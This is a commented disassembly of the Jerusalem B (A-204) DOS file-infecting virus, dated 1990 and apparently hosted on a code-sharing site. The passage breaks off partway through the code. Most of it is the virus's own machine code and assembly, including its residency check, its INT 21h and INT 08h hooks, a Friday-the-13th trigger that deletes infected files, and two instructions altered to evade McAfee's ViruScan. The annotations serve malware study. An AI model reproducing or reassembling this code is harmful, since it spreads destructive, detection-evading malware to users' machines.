📄 jerub204.asm
字号:
Virus : Jerusalem Version B Variant A-204
Disassembled by : Righard Zwienenberg
Steenwijklaan 302
2541 RT The Hague
The Netherlands
Data : +31-70-3898822, V22,V22b,HST,MNP,CM
Voive : +31-70-3675379
FidoNet address : 2:512/2.3
Used Software : ASMGEN, DEBUG and D86-Disassembler
Date : 20 june 1990
Note : All Values are hex. If a value is followd by d (e.g. 30d) it means
30 decimal.
Note : This disassembly consists of two programs. The original program was
a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time
C3 RET.
0100 E9 92 00 JMP 0195 ; JUMP -> 0195h
0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used
010A dw 00 01 ; Startaddress original program
010C dw 01 56 ; Startaddress-offset original program
010E db 00 ; Trigger for destruction (delete file)
; Always zero, but if it is Friday the 13th and the year is
; not equal 1987 this byte is set to one
010F dw 00 00 ; Storing place for original AX (read-only word)
0111 dw 20 00 ; Length of Original Program (0020h)
0113 dw A5 FE ; Storing place for original BX of INT 08h vector
0115 dw 00 F0 ; Storing place for original ES of INT 08h vector
0117 dw 60 14 ; Storing place for original BX of INT 21h vector
0119 dw 2B 02 ; Storing place for original ES of INT 21h vector
011B dw 56 05 ; Storing place for original BX of INT 24h vector
011D dw DE 0C ; Storing place for original ES of INT 24h vector
011F dw 40 7E ; Storing place for timer for 30 minutes trigger
; By init. set to 7E90h
; The following words are never used by the virus. The are used
; by a routine starting at 0398h which is executed when INT 21h
; is called with AH=DEh. This never happens in the code.
0121 dw 00 00 ;
0123 dw 00 00 ;
0125 dw 00 00 ;
0127 dw 00 00 ;
0129 dw 00 00 ;
012B dw 00 00 ;
012D dw 00 E8 ;
012F dw 06 EC ;
0131 dw 91 16 ; Storing place for original ES
0133 dw 80 00 ; Storing place for BX. Never read again
0135 00 00 00 80 00
0139 dw 91 16 ; Storing place for original ES
013B 5C 00
013D dw 91 16 ; Storing place for original ES
013F 6C 00 ;
0141 dw 91 16 ; Temp. storing place for original ES
0143 dw 00 20 ; Temp. storing place for AX
0145 dw 0D 1F ; Temp. storing place for ES+10h
0147 dw 5F 21 ; Storing place for AX
0149 dw A1 16 ; Temp. storing place for ES+10h
014B dw 00 F0 ; Temp. storing place for AX
014D db 02 ; Temp. storing place for AL
014E db 00 ; COM/EXE indicator
; 0 = EXE-File
; 1 = COM-File
0151 dw 30 01 ; Temp. storing place for DX
0153 dw 23 00 ; Temp. storing place for AX
0155 20 01
0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it
; from AX
0159 D4 06 D4 06
015D dw 98 03 ; Temp. Storing place to store AX
015F dw 10 07 ; Probably startaddress of virus in mem
0161 dw 84 19 ; Never used!!! 1984h is stored here by the code
0163 dw C5 00 ; 00C5h is being read and put back later by the code
0165 dw 99 03 ; Temp. storing place for AX
0167 1C 00 00 00 90 90 90 90 C3
0170 dw 05 00 ; Storing place for file handle (BX)
0172 dw 20 00 ; Storing place for file attributes
; bit 0 = read only
; bit 1 = hidden file
; bit 2 = system file
; bit 3 = volume label
; bit 4 = subdirectory
; bit 5 = archive bit
; bit 8 = shareable (Novell Network)
0174 dw D5 14 ; Storing place for file date (DX)
0176 dw 99 83 ; Storing place for file time (CX)
0178 dw 00 02 ; 0200h=512d Used as multiplier/divider
017A dw 10 00 ; 0001h= 1d Used as multiplier/divider
017C dw 20 3E ; Temp. storing place for AX
017E dw 00 00 ; Temp. storing place for DX
0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename
0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename
0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM
; May not become infected
018F dw 01 00 ; Storing place for variable-result of free-memory-scan
; 0000h : not enough memory available
; 0001h : enough memory available
0191 00 00 00 00
0195 FC CLD ; Clear Direct
0196 B4 E0 MOV AH,0E0 ; This is the check if the
0198 CD 21 INT 021 ; virus is already active
; in memory. INT 21h with
; AH=E0h will return AX=0300h
; if the virus is active.
019A 80 FC E0 CMP AH,0E0 ; AH>=E0h?
019D 73 16 JAE 01B5 ; Yes: -> 01B5h
019F 80 FC 03 CMP AH,3 ; AH<-03h?
01A2 72 11 JB 01B5 ; Yes: -> 01B5h
; INT 21h with AH=
; DDh,DEh,E0h
; are self-defined.
; SetUp for
; Executing original program
; We come here if an infected
; program is executed and the
; virus is already active in
; memory.
01A4 B4 DD MOV AH,0DD ;
01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h
01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h
01AC 03 F7 ADD SI,DI ; Source Index:= 0810h
; At this place the original
; Program is located
01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original
; Program)
01B3 CD 21 INT 021 ;
; Here we come when the virus
; is not yet in memory
01B5 8C C8 MOV AX,CS ; AX=Code Segment
01B7 05 10 00 ADD AX,010 ; AX:=AX+10h
01BA 8E D0 MOV SS,AX ; Stack Segment:=AX
01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h
01BF 50 PUSH AX ; Store AX
01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h
01C3 50 PUSH AX ; Store AX
01C4 CB RETF ; -> C5h
01C5 FC CLD ; Clear Direct
01C6 06 PUSH ES ; Store ES
01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES
01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places
01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ;
01D6 2E 8C 06 41 00 CS MOV W[041],ES ;
01DB 8C C0 MOV AX,ES ; AX=ES
01DD 05 10 00 ADD AX,010 ; AX=AX+10h
01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX (ES+10h) to 0149h
01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h
01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined)
01EC CD 21 INT 021 ; CALL INT 21h
01EE 80 FC E0 CMP AH,0E0 ; AH>=0Eh?
01F1 73 13 JAE 0206 ; Yes: -> 0206
01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the
; viruscode is in memory
; and interrupt 21h is called
; with AH=E0h.
01F6 07 POP ES ; Restore original ES
01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h
01FC 2E 8B 26 43 00 CS MOV SP,W[043] ;
0201 2E FF 2E 47 00 CS JMP D[047] ;
0206 33 C0 XOR AX,AX ; AX=0000h
0208 8E C0 MOV ES,AX ; ES=0000h
020A 26 A1 FC 03 ES MOV AX,W[03FC]
; Here the A-204 variant
; differs for the first
; time from the original
; Jerusalem Version B virus.
020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two line have been
0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order
; to avoid being
; detected by ViruScan from
; John McAfee.
0216 2E A2 4D 00 CS MOV B[04D],AL
021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3
0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB
0227 58 POP AX
0228 05 10 00 ADD AX,010
022B 8E C0 MOV ES,AX
022D 0E PUSH CS ; Store CS
022E 1F POP DS ; DS=CS
022F B9 10 07 MOV CX,0710 ; CX=0710h
0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0308h)
0234 33 F6 XOR SI,SI ; SI=0000h
0236 8B FE MOV DI,SI ; DI=0000h
0238 06 PUSH ES ; Store ES
0239 B8 42 01 MOV AX,0142 ; AX=0142h
023C 50 PUSH AX ; Store AX
023D EA FC 03 00 00 JMP 0:03FC
0242 8C C8 MOV AX,CS ; AX=CS
0244 8E D0 MOV SS,AX ; SS=CS
0246 BC 00 07 MOV SP,0700 ; SP=0700h
0249 33 C0 XOR AX,AX ; AX=0000h
024B 8E D8 MOV DS,AX ; DS=0000h
024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX
0251 A3 FC 03 MOV W[03FC],AX ; Store AX
0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL
0258 A2 FE 03 MOV B[03FE],AL ; Store AL
025B 8B DC MOV BX,SP ; BX=SP
025D B1 04 MOV CL,4 ; CL=04h
025F D3 EB SHR BX,CL ; BX >> 4
0261 83 C3 10 ADD BX,010 ; BX=BX+10h
0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. Why I don't know,
; the storing place is never
; read again
0269 B4 4A MOV AH,04A ;
026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES
0270 CD 21 INT 021 ; Adjust Memory Block Size
; (SETBLOCK)
0272 B8 21 35 MOV AX,03521 ; Get original INT 21h
0275 CD 21 INT 021 ; vector
0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h
027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector
0281 0E PUSH CS ; Store CS
0282 1F POP DS ; DS=CS
0283 BA 5B 02 MOV DX,025B ; DX=025Bh
0286 B8 21 25 MOV AX,02521 ; Set new INT 21h
0289 CD 21 INT 021 ; vector on DS:025Bh
028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES
028F 26 8E 06 2C 00 ES MOV ES,W[02C] ;
0294 33 FF XOR DI,DI ; DI=0000h
0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh
0299 32 C0 XOR AL,AL ; AL=0000h
029B F2 AE REPNE SCASB ;
029D 26 38 05 ES CMP B[DI],AL ;
02A0 E0 F9 LOOPNE 029B ; No Flags: DEC CX -> 02A2h
; IF CX<>0 and not equal
; -> 029B
02A2 8B D7 MOV DX,DI ; DX=DI
02A4 83 C2 03 ADD DX,3 ; DX=DX+03h
02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h
02AA 06 PUSH ES ; Store ES
02AB 1F POP DS ; Restore DS (DS:=ES)
02AC 0E PUSH CS ; Store CS
02AD 07 POP ES ; Restore ES (ES:=CS)
02AE BB 35 00 MOV BX,035 ; BX=35h
02B1 1E PUSH DS ; Store Registers
02B2 06 PUSH ES
02B3 50 PUSH AX
02B4 53 PUSH BX
02B5 51 PUSH CX
02B6 52 PUSH DX
02B7 B4 2A MOV AH,02A ; Get Current Date
02B9 CD 21 INT 021 ; DL=day
; DH=month
; CX=year
; AL=Day of the week
02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting
; infected files to 00h
02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ?
02C5 74 30 JE 02F7 ; Yes: -> 02F7h
02C7 3C 05 CMP AL,5 ; Is it Friday ?
02C9 75 0D JNE 02D8 ; No: -> 02D8h
02CB 80 FA 0D CMP DL,0D ; Is it 13th ?
02CE 75 08 JNE 02D8 ; No: -> 02D8h
; Yes: it is Friday
; the 13th and the
; year is not equal 1987
02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting
; infected files to 01h
02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h
02D7 90 NOP
02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h
02DB CD 21 INT 021 ; vector
02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX
02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector
02E7 0E PUSH CS
02E8 1F POP DS
02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into
; timer interrupt. This
; value is decreased by
; one 18.2 times per second
02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector
02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh
02F5 CD 21 INT 021 ;
02F7 5A POP DX ; Restore Registers
02F8 59 POP CX
02F9 5B POP BX
02FA 58 POP AX
02FB 07 POP ES
02FC 1F POP DS
02FD 9C PUSHF ; Store Flags
02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h
; address
0303 1E PUSH DS ; Restore DS
0304 07 POP ES ; Store ES
0305 B4 49 MOV AH,049 ; Free Memory
0307 CD 21 INT 021 ;
0309 B4 4D MOV AH,04D ; Get ExitCode of
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -